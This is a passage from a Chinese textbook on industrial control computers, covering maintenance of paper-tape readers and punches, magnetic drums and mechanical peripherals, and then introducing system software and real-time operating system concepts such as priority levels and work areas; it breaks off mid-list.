时,启动电磁铁励磁,止动时启动电磁铁释放,靠机械弹性摩擦 片止动。光敏放大器之光源,是由白炽灯经聚光后给出。灯的供 电是低压直流,采用12V、24V、36V、48V 等。采用直流是为了 防止光源亮度波动。 二、光电输入机的调整 在新设备使用以前,放大器就要调整一次。对于纸带传送部 分的导向,应按其使用纸带(5单位、6单位、8单位)之规定宽 度进行调整。对于启动和止动,需用弹簧秤校正其动态和静态拉 力。各厂家光电输入机对于拉力的要求不一致,应按出厂说明书 的要求进行。这里谈一下缓冲部件。缓冲部件在纸带传送过程中 极为重要,往往纸带抖动和纸带输入过程中出现奇偶错,都是因 为缓冲部件没有起到缓冲作用所致。因此对缓冲部件的摇臂转 轴,应给于良好的润滑,以减少阻力。对于个别的光电输入机没 有加缓冲装置的,应改加。设想一盘穿孔纸带,如果它的直径是 200~250mm 之间,当它静止时,瞬间的启动惯性是很大的,如 果不加缓冲装置,只靠几百克的启动力,是很难将纸带启动的。不带缓冲装置的光电输入机,使用时必须将一大盘纸带散开堆在 地上,需要两个人照顾,不小心还会将纸带弄乱报废。遇到这种 光电输入机,最好改加缓冲装置,如图11-6所示。根据现有光电 输入机结构情况,在光电输入机之本体上加一摇杆,然后在摇杆 上接一拉簧,拉簧的另一端固定在光电机本体上,摇杆的下端装 一辊轮,当纸带通过辊轮时便起到缓冲作用。摇杆的下端与一销 轴连接,销轴与摇杆之轴套间必须有良好的润滑,以减少阻力。 对于光敏放大器,在上机前也要进行一次调整。光在变成电 信号并以方波形式送给机器时,各机对“明”“暗”之比的要求 是不一致的,有的要求“明”:“暗”为2:1,有的要求1:1或3:2等, 须按其要求进行调整,并通过示波器进行观察。通过示波器还可 以看出纸带传送是否稳定,进而调整纸带传送部分达到稳定。对 于光敏放大器,最好采用温度补偿,虽然主机对环境温度要求严 格,且机房一般都配有恒温装置,但光敏半导体器件对温度极为 敏感。尽管机房温度采用恒温,但温差4~5℃还是允许的,就在 这4~5℃的温差条件下,光敏二极管的导电率将变化很大,那么 光敏放大器的输出变化也将加大,于是表现为输入信号不稳定, 要经常校对。有的甚至每使用一次就得事先校对一次。采用温度 补偿就可以克服这种现象。 对于光电输入机的同步信号, 一般都采用中导孔做同步孔。 对同步孔的要求是,其信号出现要比信息孔信号出现稍迟,这样 才能保证信息不丢失,在调整放大器时应予以注意。当然也有的 机器在逻辑上予以保证。总之,根据各个机器的不同情况进行 调整: 第六节 纸带穿孔机 纸带穿孔机分为自动(联机)和手动(脱机)两种。手动纸 带穿孔机是配合纸带输入机使用的不可缺少的设备。独立的手动 纸带穿孔机(有的是打字机附带穿孔机)按其结构又可分为两 种: 一种是二极管译码, 一种是机械译码。二极管译码最后也是 通过电磁铁完成其功能。机械译码是通过机械译码条完成其功 能。两种纸带穿孔机比较起来看:二极管译码穿孔机需要一组直 流供电电源,但可靠性较高;机械译码纸带穿孔机由于机械零件 的磨损是不可避免的,所以可靠性较差。 除此之外,有的手动纸带穿孔机还附有读带设备。读带设备 的结构是这样的:如八单位的读带设备,它有九个探针,其中有 一个是中导孔探针,做同步用。在与纸带穿孔机连用复制纸带 时,该同步信号是启动穿孔机离合器的。其余八个探针是信息探 针。所有探针下面都对应有一个触点,探针的机械信号由触点转 换成电信号送出,在与穿孔机连用复制纸带时,每一个触点对应 控制一个电磁铁。在读带时探针遇到纸带有孔便探出,此时触点 闭合,电磁铁即动作。遇到纸带无孔时,纸带挡住探针使其不能 探出,触点即不闭合,电磁铁即不动作。读带设备除复制纸带 外,还可以对穿孔纸带进行奇偶校验,看是否有漏孔和增孔现 象,这就是人们所称谓的“穿”、“复、”“校”。 自动纸带穿孔是属于“在线”设备,在机器中可以独占一个 外部通道,也可以和其他外部设备公用一个通道。自动纸带穿孔 机的速度较快, 一般都在100排孔/秒左右。自动穿孔机的功能主 要是将机器内的程序以穿孔纸带的形式复制出来,复制出来的纸带可以存档,也可以通过纸带输入机校对程序的正确性。 纸带穿孔机在使用过程中可能会出现漏孔,孔边缘出现毛刺 等现象。漏孔随时都可能出现。孔的边缘出现毛刺一般是纸带穿 孔机长期使用后才出现的。 漏孔是纸带穿孔机常见的主要故障。当出现漏孔时,首先应 按顺序对故障进行查找。如果所使用的是二极管译码纸带穿孔 机,应操作按键观察漏孔那一路所对应的电磁铁及其推动元件动 作情况。如果电磁铁应该励磁而不励磁,证明是译码线路的故 障。如果电磁铁励磁及动作正常,那么一定是电磁铁之后的有关 机械元件动作有误。此时只要细心观察,就比较容易查出。当所 使用的纸带穿孔机是机械译码纸带穿孔机时,操作按键,观察对 应的译码条动作是否有误。如译码条动作有误,则要调整译码条 与推动元件的相对位置使其合理。当然在润滑不好、阻力增大 时,上述现象也会产生。因此在检查和处理故障时,要考虑可能 产生故障的多方面因素进行处理。 纸带穿孔机在长期使用时,纸带上所穿之孔边缘处可能会出 现毛刺,这证明穿孔销已经不十分锋利,应当更新。穿孔销的直 径虽已标准化(中导孔销直径φ1.2~1.3mm, 信息孔销直径 φ1.8~1.9mm), 但各种穿孔机所用穿孔销就整体形状来说, 一 般都不一致,因此绝大多数都不能互相代用。对于进口的计算机 所带的纸带穿孔机,可能穿孔销的备品没有来源,那么这里有一 个小的办法可以解决。如图11-7中的1是穿孔销的上导向板,2是 穿孔销,3是穿孔纸带,4是穿孔销的下导向板。图中所示穿孔 销上部横断面即为切纸面,它的形状有两种, 一种是纯斜面, 一 种是月牙形,如图中虚线所示,它的边缘异常锋利,纸孔就靠其 边缘切下。采用斜面或月牙面目的是减小销与纸接触面,从而减少销子驱动力。在长期使用时,其销子边缘可能被磨钝,此时在 纸带上切出的孔就会出现毛刺。当销子长度足够或者行程可以调 节时,将其销子头部斜面进行研磨以达锋利,这样就可以继续使用。 自动纸带穿孔机在工业控制机中用处也是很大的。上面已经 说过可以作为复制和校验用,尤其在复杂的工艺参数调节过程 中, 一个应用程序需反复修改最后才能达到合理。在小修小改时一般都直接使用控制打字 机。但在程序完成后需要 复制纸带,如用人工复制 纸带,工作量是很大的,有了自动纸带穿孔机就比 较方便。但有的机器并没 有配备自动纸带穿孔机。这里再介绍一个手动纸带 穿孔机改成自动纸带穿孔 机的办法。当然得先看一看计算机外部通道都有些什么设备,能否配合上。譬如有制表打 字机就好办,可以直接将改造后的自动纸带穿孔机插在打字机的 信息输出插座上使用。 改造纸带穿孔机时,如果是二极管译码的纸带穿孔机,要看 它与制表打字机的信息电磁铁供电电压是否一致,若一致就可以 直接接线,不需做任何改动就可以与计算机连用,当然在自动时 要断开纸带穿孔机本身的电源。若两者电源不一致,则有两种情 况:如果纸带穿孔机电磁铁供电电压高于计算机给出的电压,可 加中间断电器;低于时可串限流电阻。如果所使用的纸带穿孔机 是机械译码类型的,则应配装电磁铁。这样做比较麻烦,但从长 期使用的角度来看,比较之下还是合算的。 第七节 磁 鼓 磁鼓是外部设备中机械结构最简单的一个,但其机械加工精 度又是最高的一个。我国目前应用最多的是凯旋机器厂生产的立式磁鼓。这种磁鼓在出厂前都严格的进行过动静平衡校验,所以 旋转起来比较平稳,噪音也很小。磁鼓平日没有什么维修工作, .磨损件只有轴承一处,而轴承 处又不允许任意打开轴承盖对轴承进行清洗加油。当轴承由于多 年运行磨损而间隙增大时(此时表现出鼓的旋转噪音明显增加), 如需要更换轴承,则必须有专人和专用工具并最好和原制造厂联 系进行检修。为了保护好轴承,平日要尽量减少磁鼓开停次数。 我们知道电机在启动的瞬间,免不了要对轴承产生冲击。而当旋 转正常后,由于鼓的动静平衡调整得很好,除了止推轴承轴向承 受其转子的重量之外,径向可以说就不承受大的作用力,因此磨 损很少。 对于磁鼓来说使用单位主要的工作只有两项:(1)保持环境 温度、湿度符合要求。空气洁净;(2)调整磁头与鼓面的间隙。 根据机器选用的读写电流大小,磁头与鼓面间隙从几十μm 到几 百Lm不等。调整时要特别注意不要划伤鼓面,间隙要从大到小。 譬如要求磁头与鼓面之间隙在80~150μm之间,那么首先要把间 隙放到150Hm或更大些,然后用手转动鼓面,测量各处的间隙变 化情况。尽管磁鼓的加工精度要求很高,但其偏心仍然存在。即 使是同一个厂的产品,其偏心度和椭圆度的大小也不会完全一 致,由此引起磁头与鼓面的各处间隙不会均等。假若一次就把磁 头和鼓面的间隙放得很小,譬如说恰巧由于偏心的原因,此时磁 头和鼓面的距离是最大位置,那么等到转到最小距离时磁头就 可能接触鼓面,引起鼓面划伤,这是调整磁头需要注意的一点。 另一个问题是必须保持鼓面与磁头的清洁,如果有较大的硬质的 灰尘微粒,也会引起鼓面划伤。在调整磁头与鼓面的间隙时,还 可以通过找临界值的办法进行合理调整。例如,假设我们把二者 的间隙放到250Hm时就出现“读”“写”信息时失时有的情况, 而把间隙继续加大则出现信息全失,减小间隙则信息全有,那么 我们即可认为250微米是临界值。此时即可把间隙放在230微米进 行一段时间考验。如果“读”、“写”信息无遗失现象,那么为了 可靠起见,将间隙再减少10~15Hm左右,便可以上机运行。这 样做的目的是为了在保证可靠的前提下保持间隙最大,以确保不划伤鼓面。当然机器出厂时都规定了范围,譬如有的机器规定 150~200Hm, 这就是说我们把间隙调整在150μm和200Lm 都可 以,但调整在150Hm时对我们使用单位来说很不利,长期运行机 械磨损是难免的, 一旦由于机械磨损失去平衡。鼓就可能产生微 小的振动,间隙太小就可能划伤鼓面。 第八节 外部设备检修中的几点经验 一、磨损件的修整 外部设备中,纯机械性的零部件占比重很大,例如一台电传打 字机就有三千多个机械零件,因此机械磨损是一个很大的问题。 造成机械磨损的因素很多,如材质、热处理、负载、润滑等。材 质、热处理等方面是制造者所考虑的,而负载、润滑等则是使用 者必须注意的。例如各种打字机的移格弹簧,如果其预紧力调得 太大,势必对相关的机械零件产生大的冲击力,也可以说这些相 关的零件所承受的负载加大了,零件磨损必然严重。因此要调整 得适当,也就会减少不必要的机械磨损。 已磨损的零件有的不能继续使用,则需要更换,而有的经过 修整以后还可以继续使用。尤其是当各种备件不足的情况下,修 整就更有必要,例如象图11-8(a) 所示的那种情况,零件C 是靠 零件B 上的一个台阶卡住的,当零件B 在A 的推动下向左移动 时,零件C的左端便在弹簧的作用下离开台阶向下移动,而其右 端则将D 件抬起,完成其动作。动作结束后零件C由 零 件E 复 位。经常这样动作, B 件的台阶处就可能被磨损成虚线所示的位 置。这样B 件对C 件就失去了止动作用。在这种情况下,我们将 台阶修整一下,如图11-8(b), 然后再调整一下C 件和B 件的相 对位置,使其各件间的动作正常,这样这个零件还可以继续 使用。 在修整时需要注意: 一般情况下,这些零件都经过了硬化处 理(如淬火),所以磨削时要小心,防止零件退火。在使用砂轮 时最好用水冷却。类似上面的例子很多,各种打字机推动移格的棘齿都可以采 用上述的办法进行修整。 二、合理使用零件以延长其使用寿命 现在,有些在机使用的外部设备,不完全都是大批生产的定 型产品,对于有些只生产了少量且不再生产的非定型产品来说, 备件的来源是十分困难的。对于进口的机器来说,备件的来源更 为困难。当然部分零件是可以自己动手做的,但有些零件如无专 门工具是无法进行制造的。因此为了保证机器长期运行,精心维 护和使用显得格外重要。如各种打字机的印字辊如能合理使用就 可以延长寿命,这个零件对于使用单位来说是没有能力进行制造 的,而且各种打字机的印字辊由于尺寸不同又很少有互换性。印 字辊在长期使用之后表面上呈现凹凸不平,如果太明显就不能继 续使用了。造成凹凸不平的原因很简单,就是因为印字辊上的定 位齿与圆筒的相对位置不变,印字辊表面上的打印点也不变,这就必然造成磨损不均匀,长期下去就会出现很深的门痕,使印字 不清晰。这个问题不难解决,只是容易忽略,而且一般维修说明 书上也并不加以介绍。如果我们将印字辊上的定位齿与圆筒的相 对位置经常变动一下,使其磨损均匀,问题也就解决了。除此之外,印字辊还有一般的维护常识。譬如保持印字辊表面清洁,不 使润滑油等有腐蚀性的物质浸入。在保证打印清晰的情况下,调 整字锤的作用力,使其均匀而且尽可能小一些。 三、传动件的调整 外部机械设备传动的方式很多,如齿轮、皮带、摩擦轮、摩 擦片等等。除齿轮传动很严格外,其他方式的传动要求都不那么 严格,是在一定范围之内的,小的打滑,滞后都是允许存在的。 对于传动件的调整,在大多数的场合是比较容易的,故障也容易 发现,因为传动件彼此相关的零件少,从表面上很容易观察到。 但也有个别部分相关的零件多,即存在两个以上的因素,在发生 故障之后,如不全盘考虑就难以处理好。例如象图11-9这种情况,A 、B 、C 、D 、E 、F 等六 个零件组成的一个传动部件, A 为转轴,B 为固定在摩擦片 上的一个制子, C 为摇臂, D 为磁铁的衔铁, E 为拉簧, F 为电磁铁。在正常情况下,当 电磁铁励磁时,吸合衔铁D, 摇臂C 在衔铁D的推动下做顺 时针旋转一个固定的角度,此 时摩擦片上的制子B 失去摇臂 C的控制,便与转轴A一起沿 顺时针的方向旋转一周,完成它自己的功能。这里,如果说发生故障,那就是漏动作。 当发生漏动作时,维修者除用手试一下摇臂C 是否灵活外, 多半怀疑弹簧拉力失调,这当然也是对的,但当经反复调整仍无 效时,就应考虑是否有其他因素。 这里,除了上两个因素之外,还有一个容易被忽略的因素, 也就是转轴A与摩擦片之间摩擦力的影响,摩擦力过大,制子B 对摇臂C 的压力就要增加,这势必就增加摇臂旋转时的阻力,这样一来磁铁就难以拉动衔铁,可能产生漏动作。当然,在这一部分 传动来说,后者是属于次要因素,但往往次要因素要引起偶然跳 动,时好时坏,使查寻故障复杂化。因此遇见这一类故障,必须 全面考虑。 四 、螺丝滑扣的修整 外部设备的底座和机架大部分是铝合金铸造的,它的优点是 重量轻,但是其机械强度、弹性、韧性都较差,它上面螺孔的螺 纹,如螺钉经常拆卸,就很容易损坏,这就是常说的螺丝滑扣。 当然,对于设备维护者来说需引起注意的是尽量减少拆装次数, 以延长螺纹的寿命。但螺纹一旦滑扣时,可采用下述办法弥补: 如图11-10,由螺钉固定的两个零件B 与C, 显然, C 件带螺纹, 当该螺纹滑扣时,可将原螺孔用丝锥扩大至一标准尺寸,例如原 螺孔直径为M5, 可以扩大到 M6。扩大之后的螺孔可将一钢丝直 径合适的螺旋弹簧旋入,图中A 件即为螺旋弹簧,这样其有关的联 结件任何尺寸都勿需变动, M5的螺钉也可以继续使用。当然也 许有人会问:如果C 件螺孔扩大,再把B 件钻孔也相应扩大,更 换成一个M6的螺钉不就完全解决问题了吗?这要看使用的位置,我们知道,外部设备,尤其是电传打字机,其机械零件布置得异 常紧密,某些零件(包括螺丝)已无余隙使其尺寸扩大,遇到这种 情况采用上述办法极为合适,同时采用这种办法还带来两个优点: ①由于螺钉只和弹簧钢丝接触,使螺母的螺纹得到保护。②被联 结件之钻孔等勿需扩大,这就保证了被联结件的机械强度不致降 低。 工业控制计算机常用的国产外部设备性能情况见附录二。 第十二章 工业控制机的软件系统 第一节 概 述 一台控制机工作的好坏,所起作用的大小,除了机器和设备 本身条件外,它所配备的软件也是一个重要的因素。 一个成熟的、 全面的软件系统可以大大发挥控制机的功能以及提高系统的可靠 性,从而达到预期的使用目的。 由于工业控制机的控制对象是多种多样的,因而就产生了为 各种不同需要而制作的软件,其数量和形式是各有特色的。但是从 软件系统的总体结构方面来谈这个问题,那么就可以说所有工业 控制机的软件系统都是大同小异的。软件系统一般由两部分组成, 一部分是机器自身所使用的基本软件(系统程序),另一部分是为 达到各种使用目的而编制的应用软件。软件系统一般的构成如图 12-1(a) 所示,而目前石油化工系统控制机软件系统的构成基本 上与此相同,但所包含的内容要少一些,具体的构成如图12-1 (b) 所示。 系统程序是每台控制机都必须配备的,如果没有了它,机器 就无法工作,并且几乎一点也不能起作用,所以系统程序是控制 机的基本软件,它是构成整个软件系统的基础。系统程序一般是 在计算机出厂时作为机器的一个组成部分一同交付出厂的。系统 程序至少要有如下几个组成部分:管理程序;汇编程序;服务程 序和引导程序。此外,还需要一个子程序库。有了这样一些基本 软件后,用户根据控制对象的要求而编制的各种应用程序才能有 条不紊地发挥作用,实现预期的使用目的。 管理程序又称为工业控制机的实时操作系统或叫做监视程 序,它的主要特点是具有较强的实时处理能力;其主要作用是提高计算机的利用率和系统的可靠性并方便用户;管理程序能保证 机器穿插执行多道程序,在各种设备动作的间隙中执行程序,使 机器在最大的效率下运行。它又能根据控制的要求而优先安排重 要的应用程序执行,同时也保证一般的应用程序尽快地执行 完毕。管理程序能使各种设备在机器执行程序的情况下以最大的 速度并行工作,大大节约机器时间。此外,管理程序还能及时地响应各种中断请求,并迅速地作出适当的处理。在机器或系统发 生问题时它能及时采取相应的措施,使系统继续运行。如在问题 严重无法解决的情况下,它立即进行报警,提醒操作人员进行处 理,同时打印出错误信息,供操作人员处理问题时参考,操作人 员可以根据管理程序所规定的操作命令(或键盘命令),在控制 打字机上打入具体的命令及有关参数,可以方便地实现与计算机 的会话。管理程序一般有四个组成部分:程序管理、设备管理、 时间管理和中断管理(大规模的系统还有存贮管理、信息管理 等)。 汇编程序配备在工业控制机中都是小而简单的。这些汇编程 序有若干条汇编命令,有简单的形成操作地址的功能,能对源纸 带进行一些简单的语法检查。这些汇编程序在使用时一般都不需 要用外存。由于工业控制机的内外存容量是比较小的,因而在机 器在线运行时是不能使用汇编程序的。只有在机器不进行控制, 同时又没有其它任务时才可以将汇编程序送入机器进行汇编工 作。当然,在机器内外存容量较大的情况下是完全可以在机器在 线运行时使用汇编程序的。但由于工业控制机的应用程序,特别 是石油化工系统的应用程序是编制完了后就不再经常改变的,最 多修改几条指令和一些系数或一些常数,所以是不需要经常使用 汇编程序的。目前我国石油化工系统的控制机都不能在线运行时 使用汇编程序。即使如此,目前这些简单的汇编程序还是能满足 石油化工系统应用程序的编制要求的。但随着自动化水平的提高 和控制对象规模的扩大,应用程序的编制工作量就会越来越大, 而且编制的要求也会越来越高,那时目前所使用的汇编程序就无 法胜任这一工作了,用它就很难在规定的时间内制作出高质量的 应用程序。最近发展起来的过程控制语言(例如PCL 语言等)是 一种有力的工具,用它可以较快地编制出大量的高质量的应用程 序,而且有一定的适用范围,对于工业控制的程序自动化来说, 过程控制语言是发展的方向。 服务程序是一种既不属于管理程序又不属于应用程序的程序。它一般是一套功能较全的对话式的键盘程序,它向操作人员 提供了一种人机联系的方法。服务程序一般有这样一些功能:修 改指令和数据;打印数据;起动或停止、增加或取消任何应用程 序;复制纸带和校核纸带;计算检查和交换内外存中的数据等。 这样一套键盘程序能给操作人员的工作带来很大的方便。它可以 在机器在线运行时修改程序的数据、输入新程序、取消旧程序等 而不影响机器运行。但是,在实际的使用中,管理程序是把服务 程序和应用程序一样看待的,并且服务程序还是级别最低,最不 重要的应用程序。由于机器的运算速度和管理程序的工作效率相 对来说还是较高的,所以尽管服务程序的级别很低,但操作人员 在操作时是根本感觉不到服务程序间断的。服务程序和管理程序 一样,是一种通用的、基本的软件,因而不能和应用程序归作 一类。 引导程序是简单的但又是必不可少的程序。它是系统在初始 起动时将目的纸带送入机器的程序。在输入的过程中,它能对纸 带进行奇偶检查以及进行检查和的检查,保证纸带上的程序和数 据准确地送入机器。引导程序还能将纸带上的数据和内外存中的 数据进行校对,发现不一致时打印出不一致的数据以及它们所在 的地址,供操作人员检查。引导程序有两部分内容, 一部分是引 导程序的本身,另一部分是把引导程序送入机器的引导程序,该 程序又称为最小引导程序,或基本引导程序。这个最小引导程序 一般只有十几条左右的指令,它由面板上的扳键送入机器,然后 起动它把引导程序送入机器;此后,引导程序再将一批批的目的 纸带送入机器。这个最小引导程序之所以只有十几条左右的指 令,是为了使操作人员便于记忆,同时减少手动操作。在有些机 器中则直接用硬件来构成这个最小引导程序,这样就不必用扳键 送入最小引导程序,而可以直接将引导程序送入机器。引导程序 仅仅在系统初始起动时起作用,系统一旦起动执行后它就没有其 它的功用了。 子程序库中放的是一些标准子程序和通用子程序。例如开方、对数、三角函数、用鼓、打印等一些子程序。在实际使用中 用户还可以根据需要增加各种子程序,充实子程序库。 一般地说 来,在一个工业控制机的软件系统中,为了提高工作效率和节省 内外存容量,是需要一个子程序库的,尽管是一个很简单的。 总之,系统程序是软件系统构成的基础,是必不可少的。对 于各种不同的控制对象来说,系统程序是通用的,是系统程序指 挥各种应用程序动作的。系统程序的功能较多,互相的关系较复 杂,在设计上考虑得比较全面,因而较之应用程序难于理解。但 是,如果比较清楚地了解了系统程序的各个组成部分以及互相的 关系,那么对整个软件系统的了解就完成了一半。所以掌握系统 程序是学习软件的一个关键。 应用程序的范围比较广,在一个软件系统中除了系统程序以 外,其它完成一定具体任务的程序都可以算作应用程序。例如面 向问题的语言AUTRAN 、APT, 通用的应用程序等。而目前石 油化工系统所使用的应用程序有的称为使用者程序,或称为目的 程序。尽管目前石油化工系统使用的应用程序在数量上和类型上 有很大的差别,但是仍然可以找出一些共同的部分。例如模拟量 输入程序、数字量输入程序、控制程序、制表程序、模拟量输出 程序、数字量输出程序。这些应用程序是每个系统基本上都配备 的。但由于不同的机器和不同的使用条件,使得这些程序在结构 上有很大的差别,不象系统程序那样是大同小异的,这里就不作 更全面的介绍了。此外,在内外存容量较大的情况下,系统可根 据情况配备诸如BASIC 、FORTRAN 等程序设计语言,进行一 些在线控制以外的计算,扩大机器的功能。 为了提高计算机的可靠性和维护速度,不少机器还配有检查 程序和诊断程序。检查程序的功能是检查机器各部分是否正常, 如对内存、运控、各种外部设备、各个外围过程通道以及软件系 统进行检查。如发现某部分工作不正常,可以用报警打印等手段 通知操作人员进行处理。或是将检查结果打印或显示出来,以供 操作人员分析比较。诊断程序是当计算机系统的某些部分出现故障或错误、而主机尚能运行时,由软件诊断出故障或错误产生的 原因和部位,并通过尚完好的手段(如打字机等)通知操作人 员,使得故障能在最短的时间内被排除掉。简单的检查程序和诊 断程序, 一般是离线使用的,即不能在计算机控制生产的同时加 以使用。在比较完善的系统中,配有在线使用的检查程序和诊断 程序。这是因为电子计算机的运算速度很快,在对生产进行控制 的时候,计算机还有一些空闲的时间,可以用来穿插运行“在 线”检查程序或“在线”诊断程序。这样一来,检查和诊断的功 能就更强、使用就更加方便了。 以上概略地介绍了软件系统的各个部分。但在一个实际使用 的软件系统中,有时各种程序的区分不太明显,各种程序的分类 也不是绝对的、严格的。以上介绍的分类只是一般的情况。只有 在比较清楚地了解了一个软件系统后,才能作出较准确的分类。 第二节 实时操作系统简介 随着现代科学技术的飞速发展,整个电子计算机科学的发展 极为迅速。因此,操作系统的概念和内容也在不断发展着。本节 不打算对实时操作系统进行全面的、系统的分析,只针对工业控 制机的一般需要作一些概念性的介绍,以说明实时操作系统中的 几个主要方面,即程序管理、设备管理、时间管理和中断管理。 由于内容比较简单,因此在本节中称其为管理程序。 读者如对实时操作系统有深入研究的兴趣,可参阅有关的专著。 一、程序管理 在一个实际使用的软件系统中,往往有十几个,几十个以至 几百个各种不同的程序。这些程序无论从长度、重要性、执行时 间、所要使用的设备等各方面来说,都是各不相同的。而对应着 这么多程序的只有一个计算机中央处理装置(CPU) 。 因而在某一 特定时刻,系统中只能有一个程序的某一部分在执行。这样显然 会产生一个问题,在某一特定时刻,哪个程序可以占用CPU, 占用多长时间,程序占用CPU 的条件和占用它的时间依什么原则而 定。这个问题是使用计算机首先要解决的。此问题的解决要根据 不同的情况和不同的使用要求而采取不同的方法。 在程序数量比较少,要求不太高的场合下,可以安排程序串 行执行;即程序依次占用CPU, 一个程序执行完了下一个程序 接着执行。这是一种简单的处理方法,只适用于很小的范围。采 用这种方法机器的利用率是很低的,而且这种方法对一般的使用 要求来说也是不能满足的,因此很少采用。 常见的和比较好的处理方法有两种:分时处理方法和实时处 理方法;这两种都是高效率的好方法。分时处理是将程序分成许 多“时间片”的方法,每一个程序只可执行“时间片”所规定的 时间,时间到了就放弃CPU, 让其它程序执行。这样一来就使得 每一个程序都有同样的占用CPU的权利,执行程序的效率就大大 提高了。“时间片”的选择要根据具体情况决定。程序长度长的情 况下,“时间片”可以长一点,程序长度短的,“时间片”可以短一 点。“时间片”如安排得恰当的话,用户就会感到所有的程序都是 并行执行的,并且几乎在差不多的时间内所有的程序都执行完 了。分时处理方法是通用机在多用户算题时采用的方法。采用这 种方法后,所有的用户都感到自己是独占了CPU 的使用,并且几 乎所有用户的题目都在差不多的时间内算完了。 实时处理方法是工业控制机常用的方法,这是由工业控制的 特点决定的。工业控制要求程序有一定的实时响应能力和实时处 理能力;即一旦要求执行程序,就得尽快地响应,并尽快地执行 完。在这种情况下,所有的程序就不能象分时方法那样,有同样 的占用CPU 的权利,并规定“时间片”了。在实时处理方法中某 一程序占用CPU 的时间不是由“时间片”决定的,而是由当时各 种程序的具体情况决定的,不是固定不变的,各种程序有不同的 优先级,优先级高的程序占用CPU 的权利大。优先级高的程序能 中断优先级低的程序,被中断的优先级低的程序只能等到优先级 高的程序执行完毕时才能继续执行;这样的处理方法对工业控制,特别是石油化工系统的控制是很适合的,石油化工系统控制 机都是采用这种方法对程序进行管理的。由于这是一种普遍的处 理方法,所以这里介绍这种实时处理方法。 (一)宏指令 宏指令和伪指令一样,都不是真正的机器指令,而是一段段 有一定功能的小程序。伪指令是为了丰富机器指令系统而设置 的,而宏指令是管理程序的一个组成部分,是为了减少编制应用 程序的工作量、节省内外存空间而设置的,因为各种应用程序在 执行的过程中,在使用设备的过程中是要和管理程序发生相当频 繁的联系的,而这些联系的具体步骤对所有的应用程序来说又几 乎是一样的。可见,如果没有宏指令,那在每一个应用程序中就 得编入这些共同的操作,这样就会浪费大量的内外存空间、精力 和时间,这是很不利的。因此,在管理程序中必须设置称为宏指 令的其中包括各个应用程序共同操作的程序。有了这些宏指令后, 应用程序就可以编制得更加简洁、明了。同时,节省大量的内外 存空间、精力和时间,由于执行宏指令就是进入管理状态,因此宏指令又称为进管指令。在管理程序中配备的宏指令可分成二 类: 一类是应用程序和管理程序联系的宏指令,另一类是应用程 序使用设备的宏指令。 第一类如请求、退出、延时、连接等一些宏指令。第二类如 打印输出、键盘输入、光电输入、用鼓等一些宏指令,调用宏指 令的格式和调用子程序类似。任何应用程序在需要时随时都可以 调用。宏指令和子程序在使用上是毫无区别的,所不同的在于宏 指令是为管理程序服务的,而子程序是为应用程序服务的。宏指 令的数量视管理程序的功能而定, 一般在十几条到二十条之间。 (二)程序的级别和工作区 为了使管理程序能按照轻重缓急的原则有效地管理应用程 序,在一个实时操作系统中必须将应用程序分成若干个不同的级 别,这样才便于管理程序进行高效率的统一调度。应用程序级别 的数量要看应用程序和机器内外存容量的情况决定。可以几个到几百个。而目前在石油化工系统控制机的管理程序中,应用程序 一般分成4~5个级,每个级中又可包括若干个副级,例如包括 255个副级。这样5级程序最多就可包括5×255=1275个应用程序。 不过在目前的一般使用中是不需要这么多应用程序的,而且机器 的内外存容量又是比较小的。所以目前在使用中一个级最多可包 括例如16个副级,这样5级程序最多就可包括5×16=80个应用程 序,这对目前一般的使用来说是足够的了。 由此可见,系统中配备的每一个应用程序都是属于一定的级 和副级的。应用程序的这种级和副级之区分可算作是它的名字, 简称程序名。有了这样的规定后,每一个应用程序都可以用它自 己的程序名来表示了。程序名一方面能使操作人员区分各个不同 的应用程序,另一方面能使管理程序按照程序名来对应用程序进 行管理。 在程序的运行过程中,高级程序能中断低级程序的执行,转 去执行高级程序。被中断的低级程序只能在高级程序执行完毕, 同时又没有其他高级程序请求时才能继续执行。可以这样说,管 理程序只允许当前级别最高的应用程序执行。程序的级之间能互 相中断,但有的机器在同一级内的副级只有优先关系而不能互相 中断。例如在同一时刻有两个同级的应用程序请求执行,这时管 理程序就让副级级别高的程序执行,副级级别低的程序暂不能执 行。但如果一个应用程序已经在执行了,这时来了同级的、但副级级别高的应用程序的话,那么这时管理程序就不允许新来的程 序执行,原来的程序继续执行。 每一级应用程序在内存中都设有一个固定大小的工作区。应 用程序在平时不执行时都是放在外存中的,在需要执行时才调入 内存中的工作区执行。同级程序在本级工作区内互相覆盖。各级 程序的工作区是不能互相侵犯的。这种方法能大大提高程序执行 的效率。这样从宏观上说,在某一时刻机器能执行多道程序,但 是从微观上说,在某一特定时刻,机器还只能执行一道程序。 固定工作区的优点是分配和管理简单,缺点是利用率不高。 因为工作区的大小是固定的,所以在执行一个短程序时工作区的 一部分是空着的,但这些空出的部分其他级的程序是不能利用 的。这样就浪费了一部分的内存。如果在执行一个较长的程序 时,工作区容纳不下这个程序,它只能用连接宏指令分段调入工 作区执行,这样程序的执行速度就较慢。这时尽管其他工作区没 有占满,甚至都空着。但也没用,不能助一臂之力。而浮动工作 区就能克服这一缺点,它是根据程序的长度来分配工作区的。分 页方法也能克服这一缺点,它的工作区不是连续的,而是分成很 小一页一页的。 一个应用程序可以分散放在好多页中。在执行时 一小页的程序执行完后这页就空出来了,其他的应用程序就能占 用。这两种方法的缺点都是管理和分配复杂。目前石油化工系统 的控制机都不采用这两种方法,而都是采用固定工作区。因为石 油化工系统控制对象的变化速度相对机器的运算速度来说还是很 慢的,所以固定工作区的程序执行速度还是能满足控制要求的。 如果有些应用程序非常重要,或者要求有很高的响应速度, 那么这些应用程序最好放在内存中。这样的应用程序就称为常驻 内存的应用程序,而平时放在外存中的,在内存中没有工作区的 应用程序就称为常驻外存的应用程序。使用情况表明,在内存容 量较大的情况下将一部分重要的应用程序作为常驻内存的应用程 序是有一定益处的。 石油化工系统控制机的内存分配图一般如图12-3所示, 一部分程序是进行保护的,即不准进行 写入操作。这样做可以防止在程序 出错或操作错误时影响整个系统的 运行。各级程序工作区的大小也不 是一样的。在内存较大的情况下, 高级程序的工作区可以大一些,这 样可以加快高级程序的执行速度。 低级程序的工作区可以小一些,低 级程序执行得慢一点也无妨。当然, 工作区的大小是完全可以一样的。 工作区大小的具体安排是用户根据 应用程序和内外存容量决定的。用 户决定了各工作区的大小后,必须 在管理程序中进行登记,使管理程 序按规定的工作区范围进行管理。 (三)程序的状态 在一个采用多道程序的系统中,基本上没有一个应用程序能 独占CPU从头到底地执行完。应用程序之间是互相穿插执行的, 在执行的过程中是经常被打断的。因而在不同的时刻和不同的情 况下,应用程序就处于各种不同的状态。归纳起来,应用程序一 般有下列六种状态: ① 请求状态(应用程序请求起动); ② 